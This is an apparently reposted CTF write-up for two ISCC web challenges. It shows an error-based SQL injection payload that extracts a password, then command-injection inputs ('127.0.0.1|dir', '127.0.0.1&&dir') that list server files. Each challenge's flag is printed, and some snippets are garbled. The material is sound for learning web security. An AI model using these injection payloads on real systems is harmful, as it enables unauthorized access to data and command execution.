"CTF Web" ISCC Web 2 Records

Source: Internet
Author: User

By chance to see the game, I wait for slag slag to do two questions, the rest of the topic work too busy no time to continue to do.

Question 1th SQL injection: Topic knowledge
   考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php
The process of doing the problem

First step: Inject Playload

    User=flag&pass= ' or Updatexml (1,concat (0x7e, (select pw from user limit), 0) # '

Step Two: Injection effect

    

Step three: Get the source code, know that the user named flag, using the injected password login can get flag

    The user name is the flag password: *75dbba7b5806e761411    loggedin! flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

Related source

Http://101.200.145.44/web1//index.php.txt

Key
 
 
    1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
Question 2nd: Topic knowledge
   考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php
The process of doing the problem

First step: Get the file name

    127.0.0.1|dir    or    127.0.0.1&&dir

Execution results
1c9976c230da289c1c359cd2a7c02d48  index.php  index.php.txt

Step two: Get the file name again

    127.0.0.1|dir 1c9976c230da289c1c359cd2a7c02d48

Execution results
flag.php

Step Three: Direct access

    1. 连接URL地址直接访问
    2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php

Related source

<?phpheader ("content-type:text/html; Charset=utf-8 "); >

Key
    1. flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}



"CTF Web" ISCC Web 2 Records

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.